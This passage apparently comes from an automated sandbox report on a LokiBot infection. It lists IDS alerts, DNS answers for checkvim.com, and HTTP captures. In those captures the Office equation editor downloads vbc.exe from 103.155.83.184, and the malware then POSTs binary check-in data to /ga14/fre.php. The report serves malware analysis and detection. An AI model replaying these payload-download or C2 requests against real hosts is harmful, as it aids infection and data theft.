                    09/28/21-06:51:14.436115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.436115TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.225.188.89.50
                    09/28/21-06:51:14.799665TCP2025483ET TROJAN LokiBot Fake 404 Response80492295.188.89.50192.168.2.22
                    09/28/21-06:51:15.070584TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.070584TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.225.188.89.50
                    09/28/21-06:51:15.439943TCP2025483ET TROJAN LokiBot Fake 404 Response80492305.188.89.50192.168.2.22
                    09/28/21-06:51:15.726731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.225.188.89.50
                    09/28/21-06:51:15.726731TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.225.188.89.50
                    09/28/21-06:51:16.076317TCP2025483ET TROJAN LokiBot Fake 404 Response80492315.188.89.50192.168.2.22
                    09/28/21-06:51:16.340414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.340414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.225.188.89.50
                    09/28/21-06:51:16.690124TCP2025483ET TROJAN LokiBot Fake 404 Response80492325.188.89.50192.168.2.22
                    09/28/21-06:51:16.959595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2025381ET TROJAN LokiBot Checkin4923380192.168.2.225.188.89.50
                    09/28/21-06:51:16.959595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923380192.168.2.225.188.89.50
                    09/28/21-06:51:17.307421TCP2025483ET TROJAN LokiBot Fake 404 Response80492335.188.89.50192.168.2.22
                    09/28/21-06:51:17.590103TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.590103TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.225.188.89.50
                    09/28/21-06:51:17.941712TCP2025483ET TROJAN LokiBot Fake 404 Response80492345.188.89.50192.168.2.22
                    09/28/21-06:51:18.196433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.196433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.225.188.89.50
                    09/28/21-06:51:18.572171TCP2025483ET TROJAN LokiBot Fake 404 Response80492355.188.89.50192.168.2.22
                    09/28/21-06:51:18.836329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.225.188.89.50
                    09/28/21-06:51:18.836329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.225.188.89.50
                    09/28/21-06:51:19.181425TCP2025483ET TROJAN LokiBot Fake 404 Response80492365.188.89.50192.168.2.22
                    09/28/21-06:51:19.451088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.451088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.225.188.89.50
                    09/28/21-06:51:19.814657TCP2025483ET TROJAN LokiBot Fake 404 Response80492375.188.89.50192.168.2.22
                    09/28/21-06:51:20.085203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.085203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.225.188.89.50
                    09/28/21-06:51:20.478231TCP2025483ET TROJAN LokiBot Fake 404 Response80492385.188.89.50192.168.2.22
                    09/28/21-06:51:20.743376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.225.188.89.50
                    09/28/21-06:51:20.743376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.225.188.89.50
                    09/28/21-06:51:21.089639TCP2025483ET TROJAN LokiBot Fake 404 Response80492395.188.89.50192.168.2.22
                    09/28/21-06:51:21.360941TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.360941TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.225.188.89.50
                    09/28/21-06:51:21.718506TCP2025483ET TROJAN LokiBot Fake 404 Response80492405.188.89.50192.168.2.22
                    09/28/21-06:51:21.987188TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.225.188.89.50
                    09/28/21-06:51:21.987188TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.225.188.89.50
                    09/28/21-06:51:22.352974TCP2025483ET TROJAN LokiBot Fake 404 Response80492415.188.89.50192.168.2.22
                    09/28/21-06:51:22.613432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.613432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.225.188.89.50
                    09/28/21-06:51:22.999512TCP2025483ET TROJAN LokiBot Fake 404 Response80492425.188.89.50192.168.2.22
                    09/28/21-06:51:23.260701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.260701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.225.188.89.50
                    09/28/21-06:51:23.608755TCP2025483ET TROJAN LokiBot Fake 404 Response80492435.188.89.50192.168.2.22
                    09/28/21-06:51:23.883186TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.225.188.89.50
                    09/28/21-06:51:23.883186TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.225.188.89.50
                    09/28/21-06:51:24.245244TCP2025483ET TROJAN LokiBot Fake 404 Response80492445.188.89.50192.168.2.22
                    09/28/21-06:51:24.517036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.517036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.225.188.89.50
                    09/28/21-06:51:24.868451TCP2025483ET TROJAN LokiBot Fake 404 Response80492455.188.89.50192.168.2.22
                    09/28/21-06:51:25.124484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.124484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.225.188.89.50
                    09/28/21-06:51:25.488807TCP2025483ET TROJAN LokiBot Fake 404 Response80492465.188.89.50192.168.2.22
                    09/28/21-06:51:25.756368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.225.188.89.50
                    09/28/21-06:51:25.756368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.225.188.89.50
                    09/28/21-06:51:26.115351TCP2025483ET TROJAN LokiBot Fake 404 Response80492475.188.89.50192.168.2.22
                    09/28/21-06:51:26.383897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.383897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.225.188.89.50
                    09/28/21-06:51:26.801508TCP2025483ET TROJAN LokiBot Fake 404 Response80492485.188.89.50192.168.2.22
                    09/28/21-06:51:27.057486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.057486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.225.188.89.50
                    09/28/21-06:51:27.408521TCP2025483ET TROJAN LokiBot Fake 404 Response80492495.188.89.50192.168.2.22
                    09/28/21-06:51:27.673999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.225.188.89.50
                    09/28/21-06:51:27.673999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.225.188.89.50
                    09/28/21-06:51:28.019418TCP2025483ET TROJAN LokiBot Fake 404 Response80492505.188.89.50192.168.2.22
                    09/28/21-06:52:04.492880TCP2025483ET TROJAN LokiBot Fake 404 Response80493075.188.89.50192.168.2.22


                    TCP Packets


                    UDP Packets

                    Sep 28, 2021 06:52:01.459906101 CEST5360953192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:01.479352951 CEST53536098.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:02.086131096 CEST5746853192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:02.105777979 CEST53574688.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:02.770040989 CEST5823453192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:02.789148092 CEST53582348.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:03.436384916 CEST6191553192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:03.457667112 CEST53619158.8.8.8192.168.2.22
                    Sep 28, 2021 06:52:04.040453911 CEST5179153192.168.2.228.8.8.8
                    Sep 28, 2021 06:52:04.060210943 CEST53517918.8.8.8192.168.2.22

                    DNS Queries

                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                    DNS Answers

                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                    Sep 28, 2021 06:51:26.308763981 CEST8.8.8.8192.168.2.220xa16aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:26.982305050 CEST8.8.8.8192.168.2.220x9490No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:27.600348949 CEST8.8.8.8192.168.2.220xc414No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.193268061 CEST8.8.8.8192.168.2.220x7ac6No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:28.808218002 CEST8.8.8.8192.168.2.220x132cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:29.410531044 CEST8.8.8.8192.168.2.220x4a40No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.026681900 CEST8.8.8.8192.168.2.220xce0aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:30.642488003 CEST8.8.8.8192.168.2.220x26a4No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.277529955 CEST8.8.8.8192.168.2.220xfbb5No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:31.911752939 CEST8.8.8.8192.168.2.220xfb02No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:32.569732904 CEST8.8.8.8192.168.2.220x7463No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.175820112 CEST8.8.8.8192.168.2.220x214eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:33.823859930 CEST8.8.8.8192.168.2.220x4df1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:34.446486950 CEST8.8.8.8192.168.2.220xdb50No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.073288918 CEST8.8.8.8192.168.2.220x2a25No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:35.688777924 CEST8.8.8.8192.168.2.220x64feNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.340655088 CEST8.8.8.8192.168.2.220x785No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:36.977107048 CEST8.8.8.8192.168.2.220xbf3cNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:37.583689928 CEST8.8.8.8192.168.2.220x3eeaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.227706909 CEST8.8.8.8192.168.2.220xfb53No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:38.848547935 CEST8.8.8.8192.168.2.220xeff0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:39.471940994 CEST8.8.8.8192.168.2.220x2267No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:40.437524080 CEST8.8.8.8192.168.2.220x97dfNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.041893959 CEST8.8.8.8192.168.2.220x7445No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:41.645601034 CEST8.8.8.8192.168.2.220x83b1No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.304616928 CEST8.8.8.8192.168.2.220x1e7fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:42.928423882 CEST8.8.8.8192.168.2.220x8815No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:43.525496006 CEST8.8.8.8192.168.2.220xe640No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.146752119 CEST8.8.8.8192.168.2.220x2d16No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:44.785208941 CEST8.8.8.8192.168.2.220x716fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:45.422796011 CEST8.8.8.8192.168.2.220xc08No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.027328968 CEST8.8.8.8192.168.2.220x6ceaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:46.652699947 CEST8.8.8.8192.168.2.220x30eaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.281250000 CEST8.8.8.8192.168.2.220x1d51No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:47.912065029 CEST8.8.8.8192.168.2.220x6008No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:48.542418957 CEST8.8.8.8192.168.2.220xd582No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.182720900 CEST8.8.8.8192.168.2.220xb3eaNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:49.812793970 CEST8.8.8.8192.168.2.220xbbd0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:50.428427935 CEST8.8.8.8192.168.2.220x21ceNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.094007015 CEST8.8.8.8192.168.2.220x5fe2No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:51.785337925 CEST8.8.8.8192.168.2.220xcfa8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:52.404402971 CEST8.8.8.8192.168.2.220x46c7No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.032078981 CEST8.8.8.8192.168.2.220xc0b8No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:53.652053118 CEST8.8.8.8192.168.2.220x8d66No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.266855001 CEST8.8.8.8192.168.2.220xa872No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:54.898588896 CEST8.8.8.8192.168.2.220xaaacNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:55.501737118 CEST8.8.8.8192.168.2.220xff5eNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.284024954 CEST8.8.8.8192.168.2.220x37edNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:56.897857904 CEST8.8.8.8192.168.2.220xff2fNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:57.662775040 CEST8.8.8.8192.168.2.220xd3e9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.280199051 CEST8.8.8.8192.168.2.220x75c9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:58.900548935 CEST8.8.8.8192.168.2.220x7d4aNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:51:59.543994904 CEST8.8.8.8192.168.2.220xae13No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.146327972 CEST8.8.8.8192.168.2.220xc359No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:00.787919998 CEST8.8.8.8192.168.2.220x13b0No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:01.479352951 CEST8.8.8.8192.168.2.220xc0feNo error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.105777979 CEST8.8.8.8192.168.2.220x3493No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:02.789148092 CEST8.8.8.8192.168.2.220x4ff9No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:03.457667112 CEST8.8.8.8192.168.2.220x3405No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)
                    Sep 28, 2021 06:52:04.060210943 CEST8.8.8.8192.168.2.220x9b70No error (0)checkvim.com5.188.89.50A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • 103.155.83.184
                    • checkvim.com

                    HTTP Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.22 | 49165 | 103.155.83.184 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:21.338944912 CEST | 0 | OUT | GET /wdc/vbc.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 103.155.83.184
                    Connection: Keep-Alive
                    Sep 28, 2021 06:50:21.629554033 CEST | 1 | IN | HTTP/1.1 200 OK
                    Date: Tue, 28 Sep 2021 04:50:21 GMT
                    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
                    Last-Modified: Mon, 27 Sep 2021 22:15:04 GMT
                    ETag: "33600-5cd016dd19714"
                    Accept-Ranges: bytes
                    Content-Length: 210432
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH`l@mkO,< u@|.text jl `.rdata12p@@.data|U@.rsrcu v@@


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.22 | 49166 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:29.583741903 CEST | 220 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 176
                    Connection: close
                    Sep 28, 2021 06:50:29.928668976 CEST | 220 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 15
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    10 | 192.168.2.22 | 49175 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:38.967765093 CEST | 232 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:39.323179007 CEST | 233 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:50 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    11 | 192.168.2.22 | 49176 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:39.638770103 CEST | 234 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:40.025614023 CEST | 234 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:51 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    12 | 192.168.2.22 | 49177 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:40.313215971 CEST | 235 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:40.677572966 CEST | 236 | IN | HTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:52 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    13 | 192.168.2.22 | 49178 | 5.188.89.50 | 80 | C:\Users\Public\vbc.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 28, 2021 06:50:40.962631941 CEST | 237 | OUT | POST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
